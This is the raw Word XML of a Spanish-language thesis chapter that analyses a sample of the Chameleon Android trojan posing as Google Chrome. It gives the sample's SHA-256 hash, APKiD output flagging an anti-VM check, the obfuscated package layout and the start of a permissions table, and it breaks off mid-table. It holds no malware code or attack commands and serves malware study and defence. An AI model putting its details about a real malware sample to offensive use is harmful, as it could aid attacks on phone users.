          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="202020"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="65" w:name="_Toc107862708"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="202020"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
      <w:bookmarkStart w:id="66" w:name="_Toc170500172"/>
      <w:r w:rsidR="00E95A92">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="202020"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Capítulo 4: Evaluación</w:t>
      </w:r>
      <w:bookmarkEnd w:id="65"/>
      <w:bookmarkEnd w:id="66"/>
    </w:p>
    <w:p w14:paraId="22F4BEF7" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DE7A60A" w14:textId="13BF5A9E" w:rsidR="00337CE1" w:rsidRPr="004246DC"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7" w:name="_Toc170500173"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="MS Mincho" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>4.1   Identificación de la muestra</w:t>
      </w:r>
      <w:bookmarkEnd w:id="67"/>
    </w:p>
    <w:p w14:paraId="65D38023" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="00E95A92">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66E16460" w14:textId="412FFDEC" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="001248D1">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Se realiza en primer lugar el hashing utilizando SHA-256 para obtener el valor único que identifica </w:t>
      </w:r>
      <w:r w:rsidR="006A6851">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">el fichero APK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>seleccionad</w:t>
      </w:r>
      <w:r w:rsidR="006A6851">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Como se ha comentado previamente, la muestra es una versión de la familia Chameleon que surgió por primera vez en </w:t>
      </w:r>
      <w:r w:rsidR="008139BD">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>noviembre</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> de 2023. Se ha obtenido del repositorio VX-Underground</w:t>
      </w:r>
      <w:r w:rsidR="00036957">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> [X]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, y ha sido también la muestra utilizada por la empresa Cyble en el único análisis conocido del malware, pese a que el informe que han realizado no se encuentra disponible públicamente. Es una</w:t>
      </w:r>
      <w:r w:rsidR="001D122E">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> aplicación </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>que se hace pasar por el popular navegador web Google Chrome. Se trata por lo tanto de un troyano de la categoría de aplicaciones conocidas, tratando de utilizar la popularidad de Chrome para aumentar su número de descargas y simulando ser una aplicación conocida y benigna.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD4AAF0" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="001248D1">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">El resultado de la función hash devuelve </w:t>
      </w:r>
      <w:r>
        <w:t>0a6ffd4163cd96d7d262be5ae7fa5cfc3affbea822d122c0803379d78431e5f6 como el identificador único del archivo APK obtenido.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAEA0E3" w14:textId="2BA284C1" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="001248D1">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A continuación, utilizaremos </w:t>
      </w:r>
      <w:r w:rsidR="003D5B82">
        <w:t>APKiD</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> para realizar un análisis básico automatizado y observar si el malware utiliza algún método estándar de packing u ofuscación, ya que este dato sería de extrema utilidad para las próximas fases. Tras utilizar </w:t>
      </w:r>
      <w:r w:rsidR="00E20D0E">
        <w:t>APKiD</w:t>
      </w:r>
      <w:r>
        <w:t>, obtenemos los siguientes resultados:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625F0D4A"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738DAE24"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Pr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">[+] APKiD 2.1.5 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5E8840" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRPr="006F6DC6"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6F6DC6">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>[*]0a6ffd4163cd96d7d262be5ae7fa5cfc3affbea822d122c0803379d78431e5f6.apk!classes.dex</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9DCBC0" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="001248D1">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6F6DC6">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>|-&gt; anti_vm : Build.MANUFACTURER check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169E700D" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRPr="006F6DC6" w:rsidRDefault="00337CE1" w:rsidP="001248D1">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006F6DC6">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>|-&gt; compiler : dexlib 2.x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573D5A65" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRPr="006F6DC6" w:rsidRDefault="00337CE1" w:rsidP="001248D1">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67C1ACF4" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="001248D1">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Pese a utilizar el modo verboso de la herramienta, no extrae una gran cantidad de información de la muestra. No obstante, con esta</w:t>
      </w:r>
      <w:r w:rsidRPr="000E1E1D">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> información obtenemos dos </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">datos que nos serán de utilidad. En primer lugar, es posible que el malware tenga un mecanismo de protección para prevenir ciertos comportamientos en el caso de encontrarse en un entorno emulado (comprobación anti_vm). En segundo lugar, el compilador utilizado es dexlib en su versión </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2. Esta no es una elección estándar [X], y se trata de un compilador común en casos en los que aplicaciones han sido inyectadas con malware previo a su reempaquetado. Esto encaja con la naturaleza de la aplicación al ser un troyano que se hace pasar por Google Chrome.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C150BCC" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRPr="000E1E1D" w:rsidRDefault="00337CE1" w:rsidP="00337CE1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E724DF4" w14:textId="12B7AE3B" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="00337CE1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="MS Mincho" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="68" w:name="_Toc107862700"/>
      <w:bookmarkStart w:id="69" w:name="_Toc170500174"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="MS Mincho" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>4.1.2   Análisis</w:t>
      </w:r>
      <w:bookmarkEnd w:id="68"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="MS Mincho" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> estático</w:t>
      </w:r>
      <w:bookmarkEnd w:id="69"/>
    </w:p>
    <w:p w14:paraId="7AC8A41B" w14:textId="77777777" w:rsidR="001248D1" w:rsidRPr="001248D1" w:rsidRDefault="001248D1" w:rsidP="001248D1">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22255000" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="001248D1">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>En esta fase se comenzará tratando de cargar el APK en Android Studio o JADX para intentar observar su código fuente y comenzar el análisis. Tras crear un nuevo proyecto en Android Studio para el APK, observamos tres paquetes diferentes en el archivo classes.dex con subpaquetes en dos de los casos, siendo la siguiente la estructura jerárquica inicial del proyecto:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7AD8FC" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="00337CE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Com.busy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE2EBE0" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="00337CE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Gather</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7FD049" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="00337CE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Lady</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0566472E" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="00337CE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Private</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC56E34" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="00337CE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Soft</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1421871A" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="00337CE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Stem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6548AB7D" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="00337CE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Unaware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE7B958" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="00337CE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>wedding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BE4420" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="00337CE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Com.microsoft.office</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094873B1" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="00337CE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Officespace</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8B0EA4" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="00337CE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Orapi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BD6C0A" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="00337CE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Otcui</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE699E4" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="00337CE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Plat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72AAACFF" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="00337CE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>playStoreDownloadManager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18BBA56E" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="00337CE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>privacy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C62AED" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="00337CE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A69A841" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="00337CE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>resourcedownloader</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22689D82" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="00337CE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226F3A2D" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="00337CE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Com.yandex</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2017A1CC" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="00337CE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Metrica</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A6D398" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="00337CE1">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C1048CF" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="001248D1">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Dados los nombres del primer paquete y sus subpaquetes, parecen haber sido ofuscado, o al menos no estar organizado de una manera lógica para ser legible. Los dos siguientes paquetes parecen hacer referencia a la suite Office de Microsoft y al sistema de recolección de métricas de Yandex, el buscador web ruso más popular. No obstante, habrá que comprobar el código presente en ellos para cerciorarse de sus funcionalidades y ver si realmente hacen referencia a estos servicios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C5F7D5" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="001248D1">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Otro archivo que es importante analizar inicialmente para comprender las posibles funcionalidades del malware es el manifiesto de permisos. Este archivo está presente en todas las </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>aplicaciones de Android, y es la declaración de la aplicación al sistema sobre los tipos de permisos que va a solicitar. Siempre se encuentra en la raíz del archivo APK desempaquetado con el nombre “</w:t>
      </w:r>
      <w:r w:rsidRPr="002F69B1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>AndroidManifest.xml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>”. Utilizaremos Apktool para obtener desempaquetados los archivos presentes en el fichero APK inicial, y los almacenaremos en el directorio “muestra_empaquetada”. Se presenta a continuación la tabla con las entradas encontradas en el XML de permisos junto con el tipo de accesos que otorga cada permiso de acuerdo con la documentación proporcionada por Google [X]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C1568F" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="00337CE1">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-E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3"/>
        <w:gridCol w:w="3480"/>
      </w:tblGrid>
      <w:tr w:rsidR="00337CE1" w14:paraId="3A8A4BF5" w14:textId="77777777" w:rsidTr="001D65C9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4986" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24227DEC" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="00A10FAD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Nombre del permiso</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4017" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A4595A2" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="001D65C9">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Acciones permitidas</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00337CE1" w14:paraId="32ECB7D6" w14:textId="77777777" w:rsidTr="001D65C9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4986" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6690C341" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="0034459D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>WRITE_EXTERNAL_STORAGE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4017" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A9F78DE" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="001D65C9">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
